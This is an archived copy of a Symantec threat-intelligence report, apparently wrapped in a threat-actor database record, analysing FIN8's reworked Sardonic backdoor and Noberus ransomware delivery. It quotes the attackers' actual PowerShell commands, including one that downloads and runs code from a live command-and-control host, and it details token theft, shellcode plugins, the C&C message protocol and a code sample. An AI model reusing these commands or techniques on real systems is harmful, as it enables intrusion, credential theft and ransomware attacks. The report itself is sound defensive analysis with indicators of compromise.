{ "id": "004140dd-d2ac-475a-b91c-60043f17fc11", "created_at": "2026-04-06T00:14:26.593767Z", "updated_at": "2026-04-10T03:35:53.19972Z", "deleted_at": null, "sha1_hash": "8648dd23fd4bcdbb6ce7bf4e074e6dcb85f12c6b", "title": "FIN8 Uses Revamped Sardonic Backdoor to Deliver Noberus Ransomware", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 71749, "plain_text": "FIN8 Uses Revamped Sardonic Backdoor to Deliver Noberus\r\nRansomware\r\nBy About the Author\r\nArchived: 2026-04-05 16:35:34 UTC\r\nSymantec’s Threat Hunter Team, a part of Broadcom, recently observed the Syssphinx (aka FIN8) cyber-crime\r\ngroup deploying a variant of the Sardonic backdoor to deliver the Noberus ransomware. \r\nWhile analysis of the backdoor revealed it to be part of the Sardonic framework previously used by the group, and\r\nanalyzed in a 2021 report from Bitdefender, it seems that most of the backdoor’s features have been altered to give\r\nit a new appearance. \r\nSyssphinx\r\nActive since at least January 2016, Syssphinx (aka FIN8) is a financially motivated cyber-crime group known for\r\ntargeting organizations in the hospitality, retail, entertainment, insurance, technology, chemicals, and finance\r\nsectors. \r\nThe group is known for utilizing so-called living-off-the-land tactics, making use of built-in tools and interfaces\r\nsuch as PowerShell and WMI, and abusing legitimate services to disguise its activity. Social engineering and\r\nspear-phishing are two of the group’s preferred methods for initial compromise.\r\nSyssphinx and Ransomware\r\nWhile Syssphinx initially specialized in point-of-sale (POS) attacks, in the past few years the group has been\r\nobserved using a number of ransomware threats in its attacks.\r\nIn June 2021, Syssphinx was seen deploying the Ragnar Locker ransomware onto machines it had compromised\r\nin a financial services company in the U.S. earlier in the year. The activity marked the first time the group was\r\nobserved using ransomware in its attacks. Ragnar Locker is developed by a financially motivated cyber-crime\r\ngroup Symantec calls Hornworm (aka Viking Spider). \r\nIn January 2022, a family of ransomware known as White Rabbit was linked to Syssphinx. A malicious URL\r\nlinked to White Rabbit attacks was also linked to Syssphinx. In addition, attacks involving White Rabbit used a\r\nvariant of the Sardonic backdoor, a known Syssphinx tool.\r\nIn December 2022, Symantec observed the group attempting to deploy the Noberus (aka ALPHV, BlackCat)\r\nransomware in attacks. Noberus is operated by a financially motivated cyber-crime group Symantec calls Coreid\r\n(aka Blackmatter, Carbon Spider, FIN7).\r\nThe Syssphinx group’s move to ransomware suggests the threat actors may be diversifying their focus in an effort\r\nto maximize profits from compromised organizations. \r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/syssphinx-fin8-backdoor\r\nPage 1 of 11\n\nBackdoors\r\nSyssphinx is known for taking extended breaks between attack campaigns in order to improve its tactics,\r\ntechniques, and procedures (TTPs). \r\nFor instance, since 2019, Syssphinx had used backdoor malware called Badhatch in attacks. Syssphinx updated\r\nBadhatch in December 2020 and then again in January 2021. Then in August 2021, Bitdefender researchers\r\npublished details of a new backdoor dubbed Sardonic and linked it to the same group. The C++-based Sardonic\r\nbackdoor has the ability to harvest system information and execute commands, and has a plugin system designed\r\nto load and execute additional malware payloads delivered as DLLs. \r\nThe Syssphinx attack observed by Symantec in December 2022, in which the attackers attempted to deploy the\r\nNoberus ransomware, involved similar techniques as a Syssphinx attack described by Bitdefender researchers in\r\n2021. \r\nHowever, the most recent attack had some key differences, including the final payload being the Noberus\r\nransomware and the use of a reworked backdoor.\r\nThe revamped Sardonic backdoor analyzed in this blog shares a number of features with the C++-based Sardonic\r\nbackdoor analyzed by Bitdefender. However, most of the backdoor’s code has been rewritten, such that it gains a\r\nnew appearance. Interestingly, the backdoor code no longer uses the C++ standard library and most of the object-oriented features have been replaced with a plain C implementation. \r\nIn addition, some of the reworkings look unnatural, suggesting that the primary goal of the threat actors could be\r\nto avoid similarities with previously disclosed details. For example, when sending messages over the network, the\r\noperation code specifying how to interpret the message has been moved after the variable part of the message, a\r\nchange that adds some complications to the backdoor logic.\r\nThis goal seemed limited to just the backdoor itself, as known Syssphinx techniques were still used. \r\nAttacker Activity\r\nDuring the December 2022 incident, the attackers connected with PsExec to execute the command “quser” in\r\norder to display the session details and then the following command to launch the backdoor: \r\npowershell.exe -nop -ep bypass -c iex (New-Object System.Net.WebClient).DownloadString('https://37-10-71-\r\n215[.]nip[.]io:8443/7ea5fa')\r\nNext, the attackers connected to the backdoor to check details of the affected computer before executing the\r\ncommand to establish persistence. \r\npowershell -nop -ep bypass -c CSIDL_WINDOWS\\temp\\1.ps1 2BDf39983402C1E50e1d4b85766AcF7a\r\nThis resulted with a process similar to that described by Bitdefender.\r\npowershell.exe -nop -c [System.Reflection.Assembly]::Load(([WmiClass]\r\n'root\\cimv2:System__Cls').Properties['Parameter'].Value);[a8E95540.b2ADc60F955]::c3B3FE9127a()\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/syssphinx-fin8-backdoor\r\nPage 2 of 11\n\nThe next day, the attackers connected to the persistent backdoor, but paused after running a few basic commands.\r\nRoughly 30 minutes later, the activity resumed with the attackers using what looked like wmiexec.py from\r\nImpacket, which started a process to launch a new backdoor.\r\ncmd.exe /Q /c powershell -nop -ep bypass -c CSIDL_SYSTEM_DRIVE\\shvnc.ps1 1\u003e\r\n\\\\127.0.0.1\\ADMIN$\\__1671129123.2520242 2\u003e\u00261\r\nThis new backdoor was used by the attackers for the next few hours.\r\nInterestingly, the new backdoor PowerShell script uses a new file name and simplifies the command-line by\r\nremoving the decryption key argument. Switching the tools like this could indicate that the attackers are testing\r\nnew features, so we were curious to analyze this new sample in detail. \r\nTechnical Analysis\r\nOne difference between the attack described by Bitdefender and the recent attacks observed by Symantec is the\r\ntechnique used to deploy the backdoor. In our case, the backdoor is embedded (indirectly) into a PowerShell script\r\n(see Figure 1) used to infect target machines, while the variant documented by Bitdefender features intermediate\r\ndownloader shellcode that downloads and executes the backdoor. \r\nFigure 1. PowerShell script contains two .NET Loaders (32-bit and 64-bit), each with embedded\r\ninjector and backdoor\r\nFigure 1. PowerShell script contains two .NET Loaders (32-bit and 64-bit), each with embedded\r\ninjector and backdoor\r\nPowerShell Script\r\nThe PowerShell script used by Syssphinx can be seen in Figure 2.\r\nFigure 2. PowerShell script used by Syssphinx\r\nFigure 2. PowerShell script used by Syssphinx\r\nThe intention of the first line of code is to delete the PowerShell script file itself. The second line checks the\r\narchitecture of the current process and picks the 32-bit or 64-bit version of the encoded .NET Loader as\r\nappropriate. The third line decodes the .NET Loader binary and loads it into the current process. Finally, the fourth\r\nline of code starts the main functionality of the .NET Loader, where the injector and backdoor are decrypted and\r\ncontrol is passed to the injector.\r\n.NET Loader\r\nThe .NET Loader is an obfuscated .NET DLL. The obfuscation manifests certain ConfuserEx features. \r\nThe .NET Loader contains two blobs, which it first decrypts with the RC4 algorithm using a hardcoded decryption\r\nkey before decompressing. The decompressed blobs are then copied into a continuous chunk of memory. The\r\n.NET Loader then transfers control to the second blob (injector), passing the memory location and size of the first\r\nblob (backdoor) as parameters.\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/syssphinx-fin8-backdoor\r\nPage 3 of 11\n\nInjector\r\nThe injector is in the form of shellcode and its entrypoint is shown in Figure 3.\r\nFigure 3. Injector entrypoint\r\nFigure 3. Injector entrypoint\r\nThe decrypt_dwords subroutine seen in Figure 3 decrypts a few dwords (marked as encrypted_dwords in Figure\r\n3) to reveal a short chunk of code. The revealed code is shown in Figure 4 and includes a decryption loop that\r\nlooks similar to the “shellcode decryption routine” described in Bitdefender’s report. \r\nFigure 4. Code revealed by the decrypt_dwords subroutine\r\nFigure 4. Code revealed by the decrypt_dwords subroutine\r\nAfter the decryption loop completes execution, we can see the full logic of the entrypoint (Figure 5). \r\nFigure 5. Full logic of entrypoint\r\nFigure 5. Full logic of entrypoint\r\nThe purpose of the injector is to start the backdoor in a newly created WmiPrvSE.exe process. When creating the\r\nWmiPrvSE.exe process, the injector attempts to start it in session-0 (best effort) using a token stolen from the\r\nlsass.exe process. \r\nBackdoor\r\nThe Backdoor is also in the form of shellcode and its entrypoint looks similar to that of the injector entrypoint,\r\nwith the exception of polymorphism.\r\nInteractive sessions\r\nOne of the interesting features of the backdoor is related to interactive sessions, where the attacker runs cmd.exe\r\nor other interactive processes on the affected computer. Interestingly, the sample allows up to 10 such sessions to\r\nrun at the same time. In addition, when starting each individual process, the attacker may use a process token\r\nstolen from a specified process ID that is different for each session. \r\nExtensions\r\nAnother notable feature is that the backdoor supports three different formats to extend its functionality. \r\nThe first is with PE DLL plugins that the backdoor loads within its own process and then calls:\r\nexport \"Start\" (if present) on loading with the following arguments:\r\nlength of parameters array below\r\naddress of parameters array containing pointers to arguments received from the remote attacker\r\nbuffer of 1024 bytes to collect output for sending to the remote attacker\r\nexport \"End\" (if present) on unloading with the following arguments:\r\n0 (hardcoded)\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/syssphinx-fin8-backdoor\r\nPage 4 of 11\n\nbuffer of 1024 bytes to collect output for sending to the remote attacker\r\nThe second format supported by the backdoor is in the form of shellcode, where each shellcode plugin executes in\r\nits own dedicated process. Before starting the shellcode, the backdoor creates a new process and writes into its\r\nmemory the shellcode blob preceded by a simple structure storing a copy of arguments received from the remote\r\nattacker. It then uses the QueueUserAPC API to execute the shellcode, such that the address of the mentioned\r\nstructure is passed as the first and only shellcode argument. To unload any shellcode plugin, the backdoor simply\r\nterminates the process associated with the specified plugin. \r\nFinally, the third format is also in the form of shellcode but with a different convention to pass the arguments. The\r\nbackdoor executes this shellcode in the context of the backdoor's main thread and no other commands are\r\naccepted until the shellcode returns. To execute the shellcode, the backdoor simply calls it as a subroutine passing\r\nfour arguments, each providing the address of the corresponding argument received from the remote attacker (the\r\nbackdoor appears to use 64-bit values when passing the addresses in case of 32-bit shellcode). \r\nNetwork communication\r\nWhen communicating with its command-and-control (C\u0026C) server, the backdoor exchanges messages of variable\r\nsize using the structure shown in Table 1.\r\nTable 1. Backdoor C\u0026C message structure\r\nOffset Size Description\r\n0 DWORD Header\r\n4 body_size BYTEs Body\r\n4 + body_size 8 BYTEs Footer\r\nThe size of body field (body_size) can be determined from the content of the header field as explained in the\r\nfollowing sections.\r\nInitial message\r\nOnce the backdoor connects to its C\u0026C server, it sends the initial message of 0x10C bytes with:\r\nheader field value 0xFFFFFCC0 (hardcoded), and\r\nfooter field left uninitialized.\r\nThe body field of the initial message is 0x100 bytes and uses the structure shown in Table 2.\r\nTable 2. Body field structure of the initial message\r\nOffset Size Description\r\n0 DWORD\r\nThe backdoor architecture where value 0 indicates 32-\r\nbit shellcode and value 1 indicates 64-bit shellcode\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/syssphinx-fin8-backdoor\r\nPage 5 of 11\n\nOffset Size Description\r\n4 DWORD rc4_key_size\r\n8 0x25 BYTEs Random padding\r\n0x2D 0x20 BYTEs\r\ninfection_id encrypted with RC4 algorithm using\r\nrc4_key as encryption key\r\n0x4D 0x5B BYTEs Padding\r\n0x88 rc4_key_size BYTEs rc4_key\r\n0x88 +\r\nrc4_key_size\r\n0x100 - (0x88 +\r\nrc4_key_size) BYTEs\r\nRandom padding\r\nThe size of rc4_key filed (rc4_key_size) is always 0x40 bytes.\r\nThe snippet shown below roughly demonstrates the method used by the backdoor to generate the infection_id.\r\nuint16_t sum_words(void *data, size_t size)\r\n{\r\n   uint16_t *words = data;\r\n   uint16_t sum = 0;\r\n   while (size \u003e= sizeof(*words)) {\r\n        size -= sizeof(*words);\r\n        sum += *words++;\r\n   }\r\n   return sum;\r\n}\r\nvoid mix(char *identifier, size_t identifier_size, char *seed, size_t seed_length)\r\n{\r\n   const char hex_digits[] = \"0123456789ABCDEF\";\r\n   size_t index = 1;\r\n   for (size_t position = 1; position \u003c identifier_size; position += 2) {\r\n        int value = index * ~(\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/syssphinx-fin8-backdoor\r\nPage 6 of 11\n\nseed[(index - 1) % seed_length]\r\n            + seed[(index % identifier_size) % seed_length]\r\n            + seed[((index + 1) % identifier_size) % seed_length]\r\n            + seed[((index + 2) % identifier_size) % seed_length]\r\n        );\r\n        ++index;\r\n        identifier[position - 1] = hex_digits[(value \u003e\u003e 4) \u0026 0x0f];\r\n        identifier[position] = hex_digits[value \u0026 0x0f];\r\n   }\r\n}\r\nvoid generate_infection_id(char *infection_id, size_t infection_id_size)\r\n{\r\n   CHAR computer_name[0x400] = {};\r\n   DWORD computer_name_size = sizeof(computer_name);\r\n   GetComputerNameA(computer_name, \u0026computer_name_size);\r\n   int cpu_info[4] = {};\r\n   __cpuid(cpu_info, 0);\r\n   DWORD volume_serial_number = 0;\r\n   GetVolumeInformationA(\"c:\\\\\", 0, 0, \u0026volume_serial_number, 0, 0, 0, 0);\r\n   char seed[0x410];\r\n   size_t seed_length = snprintf(seed, sizeof(seed), \"%s%hu%hu\",\r\n        computer_name,\r\n       sum_words(cpu_info, sizeof(cpu_info)),\r\n        sum_words(\u0026volume_serial_number, sizeof(volume_serial_number)));\r\n   mix(infection_id, infection_id_size, seed, seed_length);\r\n}\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/syssphinx-fin8-backdoor\r\nPage 7 of 11\n\nOther messages\r\nFor all the communication that follows (incoming and outgoing), the backdoor uses the following method to\r\ndetermine the size of the body field (body_size):\r\nbody_size is 0x80 for each incoming message with a header field value of 0xFFFFFE78 (hardcoded), and\r\nbody_size is simply the value of the header field in all other cases.\r\nThe content of body and footer fields is encrypted with the RC4 algorithm using rc4_key as the encryption key.\r\nThe keystream is reused when encrypting each individual field. \r\nThe footer field is 8 bytes and, once decrypted, uses the structure shown in Table 3. \r\nTable 3. Decrypted footer field structure\r\nOffset Size Description\r\n0 DWORD\r\nIn case of outgoing messages, contains body_size value (redundant). In case of\r\nincoming messages, appears to represent used part of body field (but only some\r\nimplemented cases rely on that).\r\n4 DWORD message_type\r\nFinally, the structure of the decrypted body field varies depending on the message_type. \r\nRecognized commands\r\nThe backdoor has the ability to receive and carry out the commands listed in Table 4.\r\nTable 4. Commands recognized by the backdoor\r\nCommand\r\n(message_type)\r\nDescription\r\n0x24C Exits the backdoor by returning to the caller of the Backdoor entrypoint.\r\n0x404 Exits the backdoor and terminates the process where the backdoor executes.\r\n0x224 Drops arbitrary new file with content supplied by the remote attacker.\r\n0x1FC Exfiltrates content of arbitrary file to the remote attacker.\r\n0x2F0\r\nIn case the specified interactive session is not active yet, the backdoor attempts to create\r\na session that runs a new \"cmd.exe\" process. It then writes \"chcp 65001\" followed by the\r\nnewline to the standard input of the created process as the first command to execute.\r\nFinally, the backdoor reports the name of the affected computer (per GetComputerName\r\nAPI) to the remote attacker. In case the specified interactive session already exists, the\r\nbackdoor simply passes any data received from the remote attacker to the standard input\r\nof the active process that already runs in that session.\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/syssphinx-fin8-backdoor\r\nPage 8 of 11\n\nCommand\r\n(message_type)\r\nDescription\r\n0x184\r\nCreates or updates the specified interactive session to run an arbitrary new process, but\r\nusing a stolen token. The data received from the remote attacker is parsed to recognize\r\nthe following parameters: \"-i [TOKEN_ID]\" (required): process id to steal the token\r\nfrom, and \"-c [COMMAND_LINE]\" (optional): command line to execute, where\r\nbackdoor uses \"cmd.exe\" if omitted.\r\n0x1AC Terminates any \"\"stolen token\"\" process that runs in the specified interactive session.\r\n0x1D4\r\nCloses the specified interactive session if exists and terminates any processes running in\r\nthat session.\r\n0x274\r\nLoads a DLL plugin supplied by the remote attacker, where the attacker also provides\r\narbitrary name to identify that plugin and also any arguments for the plugin initialization\r\nsubroutine. Any pre-existing DLL plugin identified by the same name gets unloaded first.\r\n0x29C Unloads DLL plugin identified by the name specified by the remote attacker.\r\n0x4F4\r\nStarts a shellcode plugin supplied by the remote attacker, where the attacker also\r\nprovides arbitrary name to identify that plugin, process id to steal the token from, and\r\nalso arbitrary data to pass as the shellcode argument. Each shellcode plugin runs in\r\nnewly created \"WmiPrvSE.exe\" process, which may use a token stolen from the\r\nspecified process (best effort). Any pre-existing shellcode plugin identified by the same\r\nname is disposed first by terminating its \"WmiPrvSE.exe\" process.\r\n0x454\r\nExecutes shellcode supplied by the remote attacker in the context of the current thread.\r\nThis is separate from plugin infrastructure and also uses a different convention for\r\npassing shellcode parameters.\r\nA Continued Threat \r\nSyssphinx continues to develop and improve its capabilities and malware delivery infrastructure, periodically\r\nrefining its tools and tactics to avoid detection. The group’s decision to expand from point-of-sale attacks to the\r\ndeployment of ransomware demonstrates the threat actors’ dedication to maximizing profits from victim\r\norganizations. The tools and tactics detailed in this report serve to underscore how this highly skilled financial\r\nthreat actor remains a serious threat to organizations.  \r\nProtection\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nIndicators of Compromise\r\nIf an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/syssphinx-fin8-backdoor\r\nPage 9 of 11\n\nSHA256 file hashes:\r\n1d3e573d432ef094fba33f615aa0564feffa99853af77e10367f54dc6df95509 – PowerShell script\r\n307c3e23a4ba65749e49932c03d5d3eb58d133bc6623c436756e48de68b9cc45 – Hacktool.Mimikatz\r\n48e3add1881d60e0f6a036cfdb24426266f23f624a4cd57b8ea945e9ca98e6fd – DLL file\r\n4db89c39db14f4d9f76d06c50fef2d9282e83c03e8c948a863b58dedc43edd31 – 32-bit shellcode\r\n356adc348e9a28fc760e75029839da5d374d11db5e41a74147a263290ae77501 – 32-bit shellcode\r\ne7175ae2e0f0279fe3c4d5fc33e77b2bea51e0a7ad29f458b609afca0ab62b0b – 32-bit shellcode\r\ne4e3a4f1c87ff79f99f42b5bbe9727481d43d68582799309785c95d1d0de789a – 64-bit shellcode\r\n2cd2e79e18849b882ba40a1f3f432a24e3c146bb52137c7543806f22c617d62c – 64-bit shellcode\r\n78109d8e0fbe32ae7ec7c8d1c16e21bec0a0da3d58d98b6b266fbc53bb5bc00e – 64-bit shellcode\r\nede6ca7c3c3aedeb70e8504e1df70988263aab60ac664d03995bce645dff0935\r\n5b8b732d0bb708aa51ac7f8a4ff5ca5ea99a84112b8b22d13674da7a8ca18c28\r\n4e73e9a546e334f0aee8da7d191c56d25e6360ba7a79dc02fe93efbd41ff7aa4\r\n05236172591d843b15987de2243ff1bfb41c7b959d7c917949a7533ed60aafd9\r\nedfd3ae4def3ddffb37bad3424eb73c17e156ba5f63fd1d651df2f5b8e34a6c7\r\n827448cf3c7ddc67dca6618f4c8b1197ee2abe3526e27052d09948da2bc500ea\r\n0e11a050369010683a7ed6a51f5ec320cd885128804713bb9df0e056e29dc3b0\r\n0980aa80e52cc18e7b3909a0173a9efb60f9d406993d26fe3af35870ef1604d0\r\n64f8ac7b3b28d763f0a8f6cdb4ce1e5e3892b0338c9240f27057dd9e087e3111\r\n2d39a58887026b99176eb16c1bba4f6971c985ac9acbd9e2747dd0620548aaf3\r\n8cfb05cde6af3cf4e0cb025faa597c2641a4ab372268823a29baef37c6c45946\r\n72fd2f51f36ba6c842fdc801464a49dce28bd851589c7401f64bbc4f1a468b1a\r\n6cba6d8a1a73572a1a49372c9b7adfa471a3a1302dc71c4547685bcbb1eda432\r\nNetwork indicators:\r\n37.10.71[.]215 – C\u0026C server\r\napi-cdn[.]net\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/syssphinx-fin8-backdoor\r\nPage 10 of 11\n\ngit-api[.]com\r\napi-cdnw5[.]net\r\n104-168-237-21.sslip[.]io\r\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/syssphinx-fin8-backdoor\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/syssphinx-fin8-backdoor\r\nPage 11 of 11", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA", "MITRE" ], "references": [ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/syssphinx-fin8-backdoor" ], "report_names": [ "syssphinx-fin8-backdoor" ], "threat_actors": [ { "id": "3150bf4f-288a-44b8-ab48-0ced9b052a0c", "created_at": "2025-08-07T02:03:24.910023Z", "updated_at": "2026-04-10T02:00:03.713077Z", "deleted_at": null, "main_name": "GOLD HUXLEY", "aliases": [ "CTG-6969 ", "FIN8 " ], "source_name": "Secureworks:GOLD HUXLEY", "tools": [ "Gozi ISFB", "Powersniff" ], "source_id": "Secureworks", "reports": null }, { "id": "9de1979b-40fc-44dc-855d-193edda4f3b8", "created_at": "2025-08-07T02:03:24.92723Z", "updated_at": "2026-04-10T02:00:03.755516Z", "deleted_at": null, "main_name": "GOLD LOCUST", "aliases": [ "Anunak", "Carbanak", "Carbon Spider ", "FIN7 ", "Silicon " ], "source_name": "Secureworks:GOLD LOCUST", "tools": [ "Carbanak" ], "source_id": "Secureworks", "reports": null }, { "id": "6f37e16f-64b2-4b9c-b5b4-08d0884660eb", "created_at": "2022-10-25T16:07:24.380872Z", "updated_at": "2026-04-10T02:00:04.966462Z", "deleted_at": null, "main_name": "Viking Spider", "aliases": [], "source_name": "ETDA:Viking Spider", "tools": [ "Ragnar Locker", "RagnarLocker" ], "source_id": "ETDA", "reports": null }, { "id": "5bdde906-0416-42ee-9100-5ebd95dda77a", "created_at": "2023-01-06T13:46:38.601977Z", "updated_at": "2026-04-10T02:00:03.035842Z", "deleted_at": null, "main_name": "FIN8", "aliases": [ "ATK113", "G0061" ], "source_name": "MISPGALAXY:FIN8", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b4ec06e5-60c9-4796-9f85-129c77d1652b", "created_at": "2023-01-06T13:46:39.21956Z", "updated_at": "2026-04-10T02:00:03.249407Z", "deleted_at": null, "main_name": "VIKING SPIDER", "aliases": [], "source_name": "MISPGALAXY:VIKING SPIDER", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bb8702c5-52ac-4359-8409-998a7cc3eeaf", "created_at": "2023-01-06T13:46:38.405479Z", "updated_at": "2026-04-10T02:00:02.961112Z", "deleted_at": null, "main_name": "FIN7", "aliases": [ "ATK32", "G0046", "G0008", "Sangria Tempest", "ELBRUS", "GOLD NIAGARA", "Coreid", "Carbanak", "Carbon Spider", "JokerStash", "CARBON SPIDER" ], "source_name": "MISPGALAXY:FIN7", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6e23ce43-e1ab-46e3-9f80-76fccf77682b", "created_at": "2022-10-25T16:07:23.303713Z", "updated_at": "2026-04-10T02:00:04.530417Z", "deleted_at": null, "main_name": "ALPHV", "aliases": [ "ALPHV", "ALPHVM", "Ambitious Scorpius", "BlackCat Gang", "UNC4466" ], "source_name": "ETDA:ALPHV", "tools": [ "ALPHV", "ALPHVM", "BlackCat", "GO Simple Tunnel", "GOST", "Impacket", "LaZagne", "MEGAsync", "Mimikatz", "Munchkin", "Noberus", "PsExec", "Remcom", "RemoteCommandExecution", "WebBrowserPassView" ], "source_id": "ETDA", "reports": null }, { "id": "ed3810b7-141a-4ed0-8a01-6a972b80458d", "created_at": "2022-10-25T16:07:23.443259Z", "updated_at": "2026-04-10T02:00:04.602946Z", "deleted_at": null, "main_name": "Carbanak", "aliases": [ "Anunak", "Carbanak", "Carbon Spider", "ELBRUS", "G0008", "Gold Waterfall", "Sangria Tempest" ], "source_name": "ETDA:Carbanak", "tools": [ "AVE_MARIA", "Agentemis", "AmmyyRAT", "Antak", "Anunak", "Ave Maria", "AveMariaRAT", "BABYMETAL", "BIRDDOG", "Backdoor Batel", "Batel", "Bateleur", "BlackMatter", "Boostwrite", "Cain \u0026 Abel", "Carbanak", "Cl0p", "Cobalt Strike", "CobaltStrike", "DNSMessenger", "DNSRat", "DNSbot", "DRIFTPIN", "DarkSide", "FOXGRABBER", "FlawedAmmyy", "HALFBAKED", "JS Flash", "KLRD", "MBR Eraser", "Mimikatz", "Nadrac", "Odinaff", "POWERPIPE", "POWERSOURCE", "PsExec", "SQLRAT", "Sekur", "Sekur RAT", "SocksBot", "SoftPerfect Network Scanner", "Spy.Agent.ORM", "TEXTMATE", "TeamViewer", "TiniMet", "TinyMet", "Toshliph", "VB Flash", "WARPRISM", "avemaria", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "f4f16213-7a22-4527-aecb-b964c64c2c46", "created_at": "2024-06-19T02:03:08.090932Z", "updated_at": "2026-04-10T02:00:03.6289Z", "deleted_at": null, "main_name": "GOLD NIAGARA", "aliases": [ "Calcium ", "Carbanak", "Carbon Spider ", "FIN7 ", "Navigator ", "Sangria Tempest ", "TelePort Crew " ], "source_name": "Secureworks:GOLD NIAGARA", "tools": [ "Bateleur", "Carbanak", "Cobalt Strike", "DICELOADER", "DRIFTPIN", "GGLDR", "GRIFFON", "JSSLoader", "Meterpreter", "OFFTRACK", "PILLOWMINT", "POWERTRASH", "SUPERSOFT", "TAKEOUT", "TinyMet" ], "source_id": "Secureworks", "reports": null }, { "id": "72d09c17-e33e-4c2f-95db-f204848cc797", "created_at": "2022-10-25T15:50:23.832551Z", "updated_at": "2026-04-10T02:00:05.336787Z", "deleted_at": null, "main_name": "FIN8", "aliases": [ "FIN8", "Syssphinx" ], "source_name": "MITRE:FIN8", "tools": [ "BADHATCH", "PUNCHBUGGY", "Ragnar Locker", "PUNCHTRACK", "dsquery", "Nltest", "Sardonic", "PsExec", "Impacket" ], "source_id": "MITRE", "reports": null }, { "id": "fc80a724-e567-457c-82bb-70147435e129", "created_at": "2022-10-25T16:07:23.624289Z", "updated_at": "2026-04-10T02:00:04.691643Z", "deleted_at": null, "main_name": "FIN8", "aliases": [ "ATK 113", "G0061", "Storm-0288", "Syssphinx" ], "source_name": "ETDA:FIN8", "tools": [ "ALPHV", "ALPHVM", "BadHatch", "BlackCat", "Noberus", "PSVC", "PUNCHTRACK", "PoSlurp", "Powersniff", "PunchBuggy", "Ragnar Loader", "Ragnar Locker", "RagnarLocker", "Sardonic", "ShellTea" ], "source_id": "ETDA", "reports": null }, { "id": "bfded1cf-be73-44f9-a391-0751c9996f9a", "created_at": "2022-10-25T15:50:23.337107Z", "updated_at": "2026-04-10T02:00:05.252413Z", "deleted_at": null, "main_name": "FIN7", "aliases": [ "FIN7", "GOLD NIAGARA", "ITG14", "Carbon Spider", "ELBRUS", "Sangria Tempest" ], "source_name": "MITRE:FIN7", "tools": [ "Mimikatz", "AdFind", "JSS Loader", "HALFBAKED", "REvil", "PowerSploit", "CrackMapExec", "Carbanak", "Pillowmint", "Cobalt Strike", "POWERSOURCE", "RDFSNIFFER", "SQLRat", "Lizar", "TEXTMATE", "BOOSTWRITE" ], "source_id": "MITRE", "reports": null }, { "id": "d85adfe3-e1c3-40b0-b8bb-d1bacadc4d82", "created_at": "2022-10-25T16:07:23.619566Z", "updated_at": "2026-04-10T02:00:04.690061Z", "deleted_at": null, "main_name": "FIN7", "aliases": [ "APT-C-11", "ATK 32", "G0046", "Gold Niagara", "GrayAlpha", "ITG14", "TAG-CR1" ], "source_name": "ETDA:FIN7", "tools": [ "7Logger", "Agentemis", "Anubis Backdoor", "Anunak", "Astra", "BIOLOAD", "BIRDWATCH", "Bateleur", "Boostwrite", "CROWVIEW", "Carbanak", "Cobalt Strike", "CobaltStrike", "DICELOADER", "DNSMessenger", "FOWLGAZE", "HALFBAKED", "JSSLoader", "KillACK", "LOADOUT", "Lizar", "Meterpreter", "Mimikatz", "NetSupport", "NetSupport Manager", "NetSupport Manager RAT", "NetSupport RAT", "NetSupportManager RAT", "POWERPLANT", "POWERSOURCE", "RDFSNIFFER", "Ragnar Loader", "SQLRAT", "Sardonic", "Sekur", "Sekur RAT", "TEXTMATE", "Tirion", "VB Flash", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434466, "ts_updated_at": 1775792153, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/8648dd23fd4bcdbb6ce7bf4e074e6dcb85f12c6b.pdf", "text": "https://archive.orkl.eu/8648dd23fd4bcdbb6ce7bf4e074e6dcb85f12c6b.txt", "img": "https://archive.orkl.eu/8648dd23fd4bcdbb6ce7bf4e074e6dcb85f12c6b.jpg" } }